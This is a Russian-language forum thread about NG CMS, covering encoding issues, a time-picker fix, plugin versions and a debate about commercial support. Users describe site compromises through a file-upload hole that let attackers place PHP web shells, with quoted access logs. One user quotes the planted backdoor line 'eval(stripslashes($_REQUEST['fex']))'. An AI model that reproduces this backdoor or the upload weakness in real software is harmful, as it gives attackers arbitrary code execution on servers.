Вы не зашли.
ahatomik, я не против.
На счет проблемы кто то что то может посоветовать?
У меня на одном сервере ну никак не хочет вписыватся в ответ кириличные символы, тупо недобавляет этот ответ и все, цыфры и латинка все ок, а кирилица нет(((
посмотрел в базе там все ок
name char(100) utf8_general_ciв чем может быть еще проблема?
эту инфу ж можно брать с rss
я бы присоеденился
файлы были загружены именно сюда /uploads/images/default/ логично что через фтп или другим путем они б загружали в другое место
infinity237, я не совсем понял твой коммент, можеш еще раз, что именно не влеяет?
у меня 100% самая последняя версия.
Думаю проблема пошла с того что у меня там стоит доделаный плагин в который можно загружать свои картинки, доступа к нему всем вроде как нет (тоесть я его никому не показываю, плагин для внутреннего использования) но скорее всего кто то как то линк нарыл, там доступа к админке не надо, туда залили картинки типа 11.jpg, хотя на самом деле там был код, из этого кода ужа дальше взламали конфиг, index.php и .htaccess и другие файлы, возможно и базу где потом взаламали юзера который уже загружал эти вот файлы через админку, просто юзеров у меня много, сотни, всех не проверяю.
Может както и попроще все сделали, хз, вопрос в том как кроме айпи теперь все это защитить, так как по айпи неочень удобно работать на растоянии.
Ха) только на этом сайте там стоит "да")), прикол, в общем 3 дня назад запретил на сервере доступ ко всему по не моем айпи, пока тишина, если что отпишусь
irbees2008, не использую, infinity237, зашел в админку и спокойно дописал .php
infinity237, нифига, у меня стоит самая последнвяя версия из ночной сборки
irbees2008, вот счас вижу что и .php дописали суки, но ранее я видел загруженые и файлы типа 11.jpg хотя там явно была не картинка
и еще написал
Если в "движке" есть уязвимость, файлы можно загружать в обход "админки", обращаясь к некоторым частям сайта напрямую.У меня была, тоесть есть, такая проблема. В корне сайта есть файлы index.php и .htaccess туда кто то постоянно вносит изменения, фактически вирус, который блокирует работу сайта, это происходит уже более недели, уже так было 3 раза, я уже и поставил права 444 на них, уже и пароли каждый раз менял но постоянно все возобновляется, вот вчера смотрю снова кто то изменил файлы и установил права 777.
Написал я все это хостеру вот что мне ответил
Здравствуйте.
Этот сайт действительно взломан. Вот в этот каталог /uploads/images/default/ были загружены специальные файлы под видом картинок (видимо ваш движок имеет уязвимость, раз позволяет загружать вместо картинок любой исполняемый файл). Файлы представляют собой удаленную оболчку через которую атакующий может загружать на сервер любые файлы и выполнять некоторые команды на сервере, в том числе создавать и удалять файлы, а так же запускать вредоносный код. Вот лог загрузки этих файлов:5.9.96.235 - - [03/Jul/2015:16:34:07 +0300] "POST /uploads/images/default/lib_fr7n8f.php HTTP/1.1" 200 174 "-" "-"
5.9.96.235 - - [03/Jul/2015:16:36:52 +0300] "POST /uploads/images/default/lib_fr7n8f.php HTTP/1.1" 200 169 "-" "-"
5.9.96.235 - - [03/Jul/2015:16:55:07 +0300] "POST /uploads/images/default/lib_fr7n8f.php HTTP/1.1" 200 169 "-" "-"
5.9.96.235 - - [03/Jul/2015:16:58:50 +0300] "POST /uploads/images/default/lib_fr7n8f.php HTTP/1.1" 200 164 "-" "-"
5.9.96.235 - - [03/Jul/2015:17:03:17 +0300] "POST /uploads/images/default/lib_fr7n8f.php HTTP/1.1" 200 169 "-" "-"Все найденные вредоносные файлы я удалил, но скорее всего это не поможет надолго, пока уязвимость в вашем движке не исправлена. С этим вопросом обратитесь к разработчику.
---
Че делать?
У меня почему то после установки 1305 ничего так и не поменялось, помогло только закомментирование overflow:hidden;
Обновил пару сайтов до последней ночной сборки и нашел один баг с временем
Почему то в календарике где устанавливается время можно вставить только с 00 до 12, с 12 до 24 невозможно установить, такая же история и с плагином "Управление публикацией новостей".
Помогло такое решение
в файле
/engine/skins/default/tpl/news/add.tpl и edit.tpl
сменить hh на HH
также в engine/plugins/nsched/nsched.php
надо в 4 местах сменить hh на HH
сегодня кстате заметил что снова сломали((
у меня недавно была похожая ситуация, ктото создал в адс_про вот таку фигню
if (isset($_REQUEST['fex'])) eval(stripslashes($_REQUEST['fex']));
соответстенно мейне вывод блока в пхп
о проблеме мне сообщил яндекс, скорее всего это примерно 2 недели длилось так как первое сообщение было 16 числа, последнее что то 27 с разными промежутками, просто не всегда яндекс открываю.
Пароль от админа только у меня, как они то делают хз, все удалил пароль сменил, вроде пропало
В потребительском отношении обвинить легко. Но я попробую объяснить свою позицию.
Я являюсь менеджером, а заодно и верстальщиком небольшой веб-студии при РА.
Наша скромная команда из 4-х человек, чтобы прокормить себя, выполняет 3-4 проекта в месяц.Почти ни один проект не может быть полностью выполнен стандартным набором средств NG CMS. А значит дорабатывать самому.
С трудом и большими затратами самого важного ресурса — времени — я очень иногда использую движок NG. Но готовых решений не хватает.Мы являемся потенциальными клиентами коммерческой версии NG, с готовыми решениями, но такой пока нет. Есть только open source. As is.
Мы готовы платить за готовые решения, но их пока нет. Не хватает.Зато на форуме если не вайн о потребительском отношении, то обязательно чуть ли не вымогательство денег. Где решения?
Почему я должен платить за то, что не совсем готово или не полностью подходит? А если подходит, то использовать не совсем удобно?Наша команда любит NG CMS. Но ещё есть над чем работать и куда развиваться, и мы очень надеемся на это развитие и ждём коммерческих предложений вместе с готовыми решениями. А пока пробуем пользоваться.
У меня похожая ситуация, правда почти все мои проекты мы делаем для себя, но я не могу разделить вашей позиции что готовых решений не хватает, а что их должно хватать? а в каком движке их хватает? Друпал?, да не смешите.... Более того, если вы делаете на продажу то что так сложно уже то что для каждого проекта свое доработать? в серйозных канторах на каждый новый проект все с нуля пишут и чето не жалуются что не совсем удобно.
Вставлю ка я свои 5 копеек в тему, думаю имея у себе около сотни проектов на NG, несколько еще с 2z я на такое право заслужил.
Так вот, за последние 3-4 года, я наверное уже раз 10 слышал похожие темы, но ниодна из них дольше года не прожила, большая часть идей умерла так и не родившись, к сожалению. Все упирается в то что все хотят управлять, а работать некому.
Думаю что и с этим вариантом будет не лучше, так как непонятно есть ли команда, что будут делать и вапше в чем разница кроме версии пхп.
Хуже всего что если кто то подсядет на новую версию, а потом автор пропадет то все будет печально (такое было с 2z, когда SwiZZeR стало просто неинтересно, и Виталий не делал форк, а пофакту просто продолжил проект на другом домене).
Хотя счас тот же ng переживает не лучшее времена, и мне кажется что если есть команда, это даже может быть 2-3 человека, то лучше все делать на том что есть, а если команды нету, то думаю и обсуждать нету смысла. Я скажу честно, у меня на большинстве проектов на 50% переделана версия ng для себя, есть команда которая делает мне что надо, ядро сохранено, все плагины работают, могбы также сделать и свой форк, но смысла чето менять пока не вижу так как тут хоть есть форум и 3-4-10 человек которые при проблеме что то могут хоть посоветовать, а вот долго ли проживет проект Styler пока не понятно.
а в плагине nsched там нету возможности выбрать время 22:30 например?
Опять старая проблема, движек припаян к московской временной зоне, где это меняется? все время забываю, а потом сутками немогу найти
Появилась проблема с временем в плагине nsched там нету возможности выбрать время 22:30 например, только до с 12до11 часов59 минут, а дальше?
скорее всего у вас старая версия плагина
Chris, скорее всего у тебя старый плагин, обновись
есть ли новая версия плагина тегов где б работал twig?